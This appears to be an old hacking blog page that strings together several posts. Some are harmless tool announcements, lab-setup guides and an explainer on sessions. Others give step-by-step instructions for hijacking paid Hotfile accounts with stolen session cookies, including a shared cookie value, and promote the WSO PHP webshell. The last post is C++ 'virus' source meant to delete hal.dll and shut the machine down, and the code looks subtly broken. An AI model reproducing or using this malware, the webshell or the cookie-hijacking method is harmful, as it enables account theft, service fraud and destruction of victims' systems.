Thursday, November 28, 2013
jSQL Injection, a Java GUI for database injection
An easy-to-use SQL injection tool for retrieving database information from a remote server.
jSQL Injection features:
* GET, POST, header, cookie methods
* visual, error-based, blind algorithms
* automatic detection of the best algorithm
* data retrieval progress
* proxy setting
For now it supports MySQL.
Running an injection requires the remote server URL and the name of the parameter to inject.
Download jSQLi: LINK 1
WSO New update 2.5.1 (PHP WebShell) - Download now
This utility provides a web interface for remote operation of the operating system and its services/daemons.
Features:
* Authorization for the cookies
* Server Information
* File manager (copy, rename, move, delete, chmod, touch, create files and folders)
* View, hexview, editing, downloading, uploading files
* Working with zip archives (packing, unpacking) + compression tar.gz
* Console
* SQL Manager (MySql, PostgreSql)
* Execute PHP code
* Working with strings + hash search in online databases
* Bindport and back-Connect (Perl)
* Bruteforce FTP, MySQL, PgSQL
* Search files, search text in files
* Support for *nix-like and Windows systems
* Anti-search-engine check (checks the User-Agent; if it is a search engine, returns a 404 error)
* You can use AJAX
* Small size. Packaged version is 22.8 Kb
* Choice of the encoding that the shell uses.
Changelog (v2.5.1):
Removed comments from the first line.
Added an option to dump certain columns of tables.
The size of large files is now determined correctly.
In the file properties, the field "Create time" was changed to "Change time" (http://php.net/filectime).
Fixed a bug that broke MySQL brute force if a server port was specified.
Fixed a bug due to which the contents of a table called download in the database could not be viewed.
Download it from here: LINK 1 LINK 2
Burp Suite Free Edition v1.5 released
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.
Burp Suite contains the following key components:
An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
An application-aware Spider, for crawling content and functionality.
An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
A Repeater tool, for manipulating and resending individual requests.
A Sequencer tool, for testing the randomness of session tokens.
The ability to save your work and resume working later.
Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.
This is a significant upgrade with a wealth of new features added since v1.4, most notably:
Completely new user interface with numerous usability enhancements.
Several new Proxy listener options, to deal with unusual situations.
New payload types in Burp Intruder.
JSON support.
Support for streaming HTTP responses.
Support for Android SSL connections (device and emulator).
Numerous new session handling options.
Full contextual documentation within the software itself.
Download Burp Suite Free Edition v1.5: LINK 1
SSLsplit: Tool for man-in-the-middle attacks against SSL/TLS encrypted network connections.
SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing.
SSLsplit supports plain TCP, plain SSL, HTTP and HTTPS connections over both
IPv4 and IPv6. For SSL and HTTPS connections, SSLsplit generates and signs
forged X509v3 certificates on-the-fly, based on the original server certificate
subject DN and subjectAltName extension. SSLsplit fully supports Server Name
Indication (SNI) and is able to work with RSA, DSA and ECDSA keys and DHE and
ECDHE cipher suites. SSLsplit can also use existing certificates of which the
private key is available, instead of generating forged ones. SSLsplit supports
NULL-prefix CN certificates and can deny OCSP requests in a generic way.
SSLsplit version 0.4.5 was released on Nov 07. The changelog:
- Add support for 2048 and 4096 bit Diffie-Hellman.
- Fix syslog error messages (issue #6).
- Fix threading issues in daemon mode (issue #5).
- Fix address family check in netfilter NAT lookup (issue #4).
- Fix build on recent glibc systems (issue #2).
- Minor code and build process improvements.
Download SSLsplit: LINK 1
OWASP Joomscan -Joomla vulnerability scanner identifies 673 vulnerabilities
Joomscan is a penetration testing tool that helps find vulnerabilities in the Joomla CMS. The updated version can detect 673 vulnerabilities. It detects file inclusion, SQL injection and command execution vulnerabilities of a target Joomla! web site.
Download Joomscan: LINK 1
How to use Joomscan?
How to use Joomscan to find the Joomla Vulnerability in Backtrack 5 Linux?
Joomscan is a penetration testing tool that helps find vulnerabilities in the Joomla CMS. The updated version can detect 550 vulnerabilities. Let me show how to use Joomscan in Backtrack 5.
Download the Joomscan from here:
http://web-center.si/joomscan
Step 1: Moving to PenTest folder
Copy/move the downloaded files into the directory
/pentest/web/scanners/joomscan/
Step 2: Set Permission
Now you have to set permissions for the Joomscan file. To do this, type the following command in Terminal (if you don't know how to open a terminal at all, please stop reading this and start with the basics of Linux).
chmod 0777 joomscan.pl
Step 3: Update
Update the scanner to the latest version. To do this, enter the following command in Terminal:
./joomscan.pl update
Step 4: Scanning for Vulnerability
Now that everything is ready, we scan our Joomla site for vulnerabilities. To do this, enter the following command in Terminal:
./joomscan.pl -u www.YourJoomlasite.com
Wait for a while, and it will list the vulnerabilities found.
How to Use Premium Cookies? Edit cookies in any website
In my last post I explained how to hack the Hotfile cookies and download like a premium account user (that article is an example of cookie editing). Here is the general tutorial to add or edit premium cookies.
Requirements:
Web Developer Add on
Step 1: Install Web Developer Add on
Install the Web Developer add-on. Using this add-on we are going to edit the cookies.
https://addons.mozilla.org/en-US/firefox/addon/web-developer/
Restart the browser. Now you can see the Web Developer toolbar. It consists of Disable, Cookies, CSS, Forms, etc.
Step 2: Visit website
Visit the website corresponding to your premium cookies.
Step 3:
Now click the Cookies option in the Web Developer toolbar and select View Cookies information. It will show the list of cookies.
To add a cookie, click "Add the cookie" in the toolbar instead, then skip to step 6.
Step 4: Find the cookie
Find the cookie that you want to edit. Some websites store the login cookie as the "auth" cookie, so find the auth cookie.
Click the edit cookie link.
This will pop up the cookie window.
Step 6:
Paste the premium cookies in the value field.
Increase the download speed of Hotfile like a premium account - cookies hack
Hi friends, I think this is my first post about Hotfile. Hotfile is a file sharing website. On Hotfile, the download speed for a normal user is very slow, but for a premium account it is faster. In this post, I am going to explain how to download files from Hotfile like a premium account.
Here is the video version of this tutorial:
How to use Premium cookies? Video Tutorial
In this method, we are going to use premium cookies (cookies obtained by a cookie stealing method). The website identifies the user based on the cookies. Cookies are the only factor that determines whether you are a normal user or a premium user. More details about session and cookies. So, using the premium cookies, you can make the website believe that you are a premium user. Sounds good! But how to do it? This can be achieved by cookie editing.
Method 1: Requirements:
A normal free account in Hotfile
Premium cookies
Install Web Developer Add on
Step 1: Install Web Developer Add on
Install the Web Developer add-on. Using this add-on we are going to edit the cookies.
https://addons.mozilla.org/en-US/firefox/addon/web-developer/
Restart the browser. Now you can see the Web Developer toolbar. It consists of Disable, Cookies, CSS, Forms, etc. We are going to use the Cookies option alone for this hack.
Step 2: Login with Free account
Log in to your free account on Hotfile.com.
Step 3:
I hope you are on hotfile.com. Now click the Cookies option in the Web Developer toolbar and select View Cookies information. It will list the cookies.
Step 4: Find auth cookie
Find the cookie named "auth" (you can see this if you are logged in).
Step 5: Edit cookie
Click the Edit cookie link. It will open a new pop-up window.
Step 6: Change the Value
Now delete the contents of the Value label. Paste the premium cookie that you have into the Value text field and click OK.
Step 7: What is the next step?
You are now a premium member! Start downloading from Hotfile like a premium member. Enjoy!
Method 2:
Method 2 is the same as method 1. Instead of editing a cookie, we just add a new cookie. So this method does not need a free account either.
Visit hotfile.com
Click the cookie option as described in the above method.
Select Add cookie
It will open a small pop-up window.
Enter "auth" in the name field
Paste the premium cookies in the "Value" field.
Reload the page
That's all, you are finished.
Both methods work perfectly.
Having doubts? Post comments here.
Here is one premium cookie for you (copy it to your desktop, I will delete it as soon as possible):
4afa81803373a6e2c29fcc1f782f8161d327c529eaa4e124e6eff19a822bfe9b
How to Hack Premium Accounts using Cookies? | Free Hacking Video Tutorials
We are glad to say we are releasing our first free hacking video tutorials. If you want this tutorial in plain text with screenshots, please follow this link:
How to Use Premium Cookies?
Hacking Video Tutorial:
Wednesday, November 27, 2013
Cookies Editing - Web Developer Mozilla Addon
Today I am going to introduce a Mozilla add-on which will be very helpful for web developers (and for hackers also).
Features:
View/Add/Edit Cookies
Clear cookies
Disable images in a website
Disable JavaScript in a website
Disable CSS in a website
more...
Download and install the add on from here:
https://addons.mozilla.org/en-US/firefox/addon/60
or try this
https://addons.mozilla.org/en-US/firefox/addon/web-developer/
What is a Session in the Computer World? Magic Cookies
What is a Session?
HTTP communicates over many TCP connections, so the server should create a unique identifier for each connection.
A session is a unique identifier that is generated and sent to the client from a server in order to identify the current interaction session.
Whenever you visit a webpage or log in to a website, the server stores data about you on your system as a cookie. This cookie helps to identify you.
For example, say you log in to Facebook.com. When you log in to your account, a cookie is generated and stored on your local system. If you click logout, the cookie is destroyed.
Software Implementation:
TCP sessions are implemented using multithreading. Whenever a session is generated, a new thread is created.
HTTP sessions are typically not implemented using one thread per session, but by means of a database with information about the state of each session.
Server side web sessions:
The sessions are stored on the server machine.
Client side web sessions:
Client-side sessions use cookies. This reduces the server-side storage.
This is the best method, but there is one drawback: sessions stored on the client are vulnerable to tampering by hackers. This can be overcome by encrypting the session (but hackers are able to decrypt it also).
HTTP session token
The client usually stores and sends the token as an HTTP cookie and/or sends it as a parameter in GET or POST queries.
The reason to use session tokens is that the client only has to handle the identifier. All session data is stored on the server (usually in a database, to which the client does not have direct access) linked to that identifier.
A magic cookie is simply a cookie that is used to authenticate the user on a remote server or simply a computer. In general, cookies are used to maintain sessions on websites and store the remote address of the website.
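The two session styles described above, shown from the server's side as an added example (not code from the original post). The client-side cookie is protected with an HMAC-SHA256 integrity tag, which is a different technique from the encryption the post mentions; all names, the key and the sample user are constructed for illustration.

```python
import base64, hashlib, hmac, json, secrets, time

SERVER_KEY = secrets.token_bytes(32)  # constructed key; it never leaves the server

def b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")

def b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def issue_client_session(data: dict, ttl: int = 3600, now: float = None) -> str:
    """Client-side session: the cookie value is payload + HMAC-SHA256 tag."""
    now = time.time() if now is None else now
    payload = json.dumps({"data": data, "exp": int(now) + ttl}).encode()
    tag = hmac.new(SERVER_KEY, payload, hashlib.sha256).digest()
    return b64e(payload) + "." + b64e(tag)

def read_client_session(cookie: str, now: float = None):
    """Return the session data, or None if the cookie was edited or expired."""
    now = time.time() if now is None else now
    try:
        payload_b64, tag_b64 = cookie.split(".")
        payload, tag = b64d(payload_b64), b64d(tag_b64)
    except ValueError:  # wrong number of parts or invalid base64
        return None
    expected = hmac.new(SERVER_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None  # integrity check failed: value was changed client-side
    body = json.loads(payload)
    return body["data"] if body["exp"] >= now else None

class ServerSessionStore:
    """Server-side sessions: the cookie carries only a random identifier."""
    def __init__(self):
        self._sessions = {}
    def login(self, user: str, plan: str) -> str:
        token = secrets.token_urlsafe(32)  # unguessable session token
        self._sessions[token] = {"user": user, "plan": plan}
        return token
    def lookup(self, token: str):
        return self._sessions.get(token)
    def logout(self, token: str) -> None:
        self._sessions.pop(token, None)  # server forgets it; old cookie is dead

def demo() -> dict:
    cookie = issue_client_session({"user": "alice", "plan": "free"}, now=1000)
    # Constructed tampering: edit the payload in the cookie, keep the old tag.
    body = json.loads(b64d(cookie.split(".")[0]))
    body["data"]["plan"] = "premium"
    edited = b64e(json.dumps(body).encode()) + "." + cookie.split(".")[1]
    store = ServerSessionStore()
    token = store.login("alice", "free")
    before_logout = store.lookup(token)
    store.logout(token)
    return {
        "genuine": read_client_session(cookie, now=1001),
        "edited": read_client_session(edited, now=1001),
        "expired": read_client_session(cookie, now=1000 + 3601),
        "server_before_logout": before_logout,
        "server_after_logout": store.lookup(token),
    }

if __name__ == "__main__":
    print(demo())
```

The integrity tag only detects edits: a cookie copied whole from another user still verifies until it expires, which is why the expiry is short-lived here and why the server-side store drops the token on logout.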
Ethical Hacking Lab to Test and Learn SQL injection, XSS, CSRF Vulnerability
So far I have provided a few web application pen testing tutorials. Now it is time to practice your hacking / pentesting skills in a legal way. Last time, I explained the Damn Vulnerable Web Application (DVWA).
Now I've come with a different web application that will help you to improve your knowledge of web app pentesting.
The BodgeIt Store
Like DVWA, this is also a vulnerable web application that will help you to develop your skills in pen testing.
With this vulnerable application, you can practice the following attacks:
Cross Site Scripting (XSS)
SQL injection (SQLi)
Hidden (but unprotected) content
Cross Site Request Forgery
Debug code
Insecure Object References
Application logic vulnerabilities
There is also a 'scoring' page (linked from the 'About Us' page) where you can see various hacking challenges and whether you have completed them or not.
How to setup the Pen Testing Lab?
Requirements:
BodgeIt app(download)
Tomcat server
Download the bodgeit.1.3.0.zip file and extract it. Now you will get a WAR file (bodgeit.WAR).
Step 1: Install Tomcat
Install Tomcat on your system. If you don't know how to install Tomcat, do a Google search.
Step 2: Start the server
Start the Tomcat server.
In Ubuntu, type the following command in Terminal:
sudo /etc/init.d/tomcat6 start
For Windows users, just click the Tomcat server in All Programs.
Step 3:
Open the browser and type "localhost:8080". It will show a page "It works !". There you can access the manager webapp (http://localhost:8080/manager/html) page. Clicking the link will ask you to enter the username and password. Enter your computer username and password.
Step 4:
Now you are on the "Tomcat Web Application Manager" page. Scroll down and there you can see the "WAR file to deploy" form.
Step 5: Deploying the WAR
Click the Browse button and select the bodgeit.WAR file. Now click the Deploy button.
Set up your own Lab for practicing SQL injection and XSS : Ethical Hacking
While surfing the internet, I came to know about the "Damn Vulnerable Web App (DVWA)". It is a web application used for practicing your ethical hacking / pen testing skills in a legal way.
Download this web application from here:
http://www.dvwa.co.uk/
To install this application, you will need the XAMPP server.
The installation procedure:
Using this application, you can also practice:
* LFI /RFI (File Inclusion methods)
* Command Execution
* Upload Script
* Login Brute Force
How to create a Big size file ?
You can create a big file using the default Windows command prompt itself. Why do we need a huge file? For when you create a virus, or you can use it in your college for occupying the memory.
First of all, decide the size of the huge file. For example, if you decide on 1 million bytes, then we should convert it to hexadecimal format. Use the Windows Calculator in Scientific mode to convert to hexadecimal.
We plan to create a 1-million-byte file. So, enter 1000000 in the calculator and click on the Hex option to convert it (1 million in hex is F4240). Pad the result with zeroes on the left until the file size reaches eight digits: 000F4240.
* Now go to Start -> Run
* Enter "cmd" to open the window.
* Enter the command DEBUG BIGFILE.DAT and ignore the File not found message.
* Type RCX and press Enter.
* Debug will display a colon prompt.
* Enter the last four digits of the hexadecimal number you calculated (4240, in our example).
* Type RBX and press Enter, then enter the first four digits of the hexadecimal size (000F, in our example).
* Enter W for Write and Q for Quit.
* You've just created a 1-million-byte file using Debug.
* Of course you can create a file of any desired size using the same technique.
C++ virus that deletes the hal.dll file in system32
Hi, in this article I will give you the C++ virus code. Don't use it for any illegal purpose. This is for learning purposes only.
#include<stdio.h>
#include<stdlib.h>
using namespace std;
int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
The above code will find the system32 folder and delete the "hal.dll" file.